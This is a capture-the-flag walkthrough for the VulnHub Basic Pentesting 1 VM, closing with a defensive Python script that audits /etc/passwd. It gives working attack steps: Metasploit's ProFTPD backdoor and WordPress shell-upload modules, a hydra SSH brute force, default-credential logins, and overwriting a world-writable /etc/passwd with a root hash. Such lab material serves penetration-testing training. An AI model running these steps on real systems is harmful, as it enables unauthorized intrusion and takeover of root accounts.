Vulnhub - Basic_Pentesting1
Basic Pentesting1 is a boot2root virtual machine created by Josiah Pierce, designed to help newcomers develop penetration testing skills. The VM contains multiple remote vulnerabilities and privilege escalation vectors, providing a practical environment for users to explore offensive security techniques. The goal is to remotely attack the VM, gain root privileges, and read the flag located at /root/flag.txt. The VM is available for download on VulnHub.
Port Scanning
$ nmap -A <target_ip>
Other Scanning Examples:
$ nmap -A -p- -T4 <target_ip>
$ nmap -sV -sC <target_ip>
After the nmap scan finishes, we find 3 open ports running FTP, SSH and HTTP.
Exploiting port 21 ProFTPD 1.3.3c
$ msfconsole
$ search ProFTPD
$ use exploit/unix/ftp/proftpd_133c_backdoor
$ set rhosts <target_ip>
$ set rport 21
$ run   # or: exploit
User enumeration
From the previous FTP exploit we found two users on the box: marlinspike and root.
Bruteforcing into port 22 (SSH) using hydra trying default credentials
$ hydra -l marlinspike -P <wordlist> ssh://<target_ip> -V
Password found for user marlinspike:
[22][ssh] host: 192.168.1.70 login: marlinspike password: marlinspike
Privilege Escalation
We can use the following find command to look for SUID binaries that we might be able to abuse:
find / -type f -perm -u=s 2>/dev/null
After researching, we find that the user marlinspike is allowed to run all commands via sudo.
Now, let's try abusing that with sudo su, entering the user's own password (marlinspike/marlinspike), and boy, we are in :V
Directory Enumeration for port 80 (http-server)
gobuster dir -u http://<target_ip> -w <wordlist>
We found a /secret directory. Let's check it in the browser.
We can see a WordPress blog running on the server, but the webpage is not loading properly because it references the hostname vtcsec.
So let's add vtcsec (pointing at the target IP) to our /etc/hosts file and check how the webpage looks afterward.
Now, let's go to /wp-admin, the admin panel for WordPress sites, and try the default login credentials admin/admin. We're in. If the default credentials had not worked, we probably would have needed to bruteforce the admin panel via Burp Suite Intruder, hydra, or whichever bruteforcing tool you prefer.
Now, let’s try to gain access with wordpress exploit via metasploit.
$ msfconsole
$ search wp_admin
$ use exploit/unix/webapp/wp_admin_shell_upload
Set every option the exploit requires, then run it.
We can see that we got ourselves a meterpreter session.
Privilege Escalation
To check for any potential misconfigurations that could lead to privilege escalation, a good script to use is unix-privesc-check from pentestmonkey.
This can be uploaded from the meterpreter session by running the following command:
upload /usr/bin/unix-privesc-check /tmp/unix-privesc-check
I prefer working inside the /tmp directory.
After we upload the file to the server, we can drop to a shell and make it executable:
$ shell
$ cd /tmp
$ chmod +x unix-privesc-check
The author of unix-privesc-check recommends grepping the output for WARNING, which will show any potential misconfigurations. This can be run as one single command:
./unix-privesc-check standard | grep WARNING
After executing unix-privesc-check we can see: WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd
This means that we can write into the /etc/passwd file. So, let’s download the file into our host machine by getting back into our meterpreter shell and executing:
download /etc/passwd
Now, from a local terminal, we can use openssl to generate a new hashed password:
openssl passwd -1 lol
We get our hashed password i.e $1$X5FkPmLQ$h0yILWHDiUeWUeezpmWU20
Now, open the passwd file we downloaded before and replace the x in the root entry (the second field, the password field) with the hash we just generated.
Now, all we need to do is upload the modified passwd file from our host to the target server using (local path first, then remote path):
upload <modified_passwd_file> /etc/passwd
To make the shell interactive:
python -c 'import pty; pty.spawn("/bin/bash")'
Finally, we can switch to root’s account.
$ su root
Password: lol
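As an added example (not part of the original walkthrough), here is a small audit script a defender could run to catch the two conditions this chain relied on: a world-writable /etc/passwd and a password hash stored directly in passwd instead of /etc/shadow. The sample passwd content is constructed, reusing the hash generated above; audit_passwd and audit_passwd_file are names chosen here.

```python
"""Audit an /etc/passwd file for the weaknesses abused in this walkthrough."""
import os
import stat

# Password-field values that mean "look in /etc/shadow" or "locked", not a hash.
SHADOWED = {"x", "*", "!", "!!", "*NP*"}


def audit_passwd(text, mode=None):
    """Return a list of (severity, message) findings for passwd content.

    text: the file contents; mode: its st_mode (None skips the permission check).
    """
    findings = []
    if mode is not None and mode & stat.S_IWOTH:
        findings.append(("CRITICAL", "/etc/passwd is world-writable (mode %o)"
                         % stat.S_IMODE(mode)))
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("WARNING", f"line {lineno}: malformed entry ({len(fields)} fields)"))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append(("CRITICAL", f"{user}: empty password field, login without password"))
        elif pw not in SHADOWED:
            # A real hash here bypasses /etc/shadow; exactly what the walkthrough injected.
            findings.append(("CRITICAL", f"{user}: password hash stored in passwd instead of shadow"))
        if uid == "0" and user != "root":
            findings.append(("CRITICAL", f"{user}: uid 0 account that is not root"))
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Audit a real file on disk, including its permission bits."""
    with open(path) as f:
        text = f.read()
    return audit_passwd(text, os.stat(path).st_mode)


# Constructed sample reproducing the state after the walkthrough's edit (hash from above).
SAMPLE = """root:$1$X5FkPmLQ$h0yILWHDiUeWUeezpmWU20:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
"""

if __name__ == "__main__":
    for sev, msg in audit_passwd(SAMPLE, 0o100666):  # 0o666: world-writable regular file
        print(sev, msg)
```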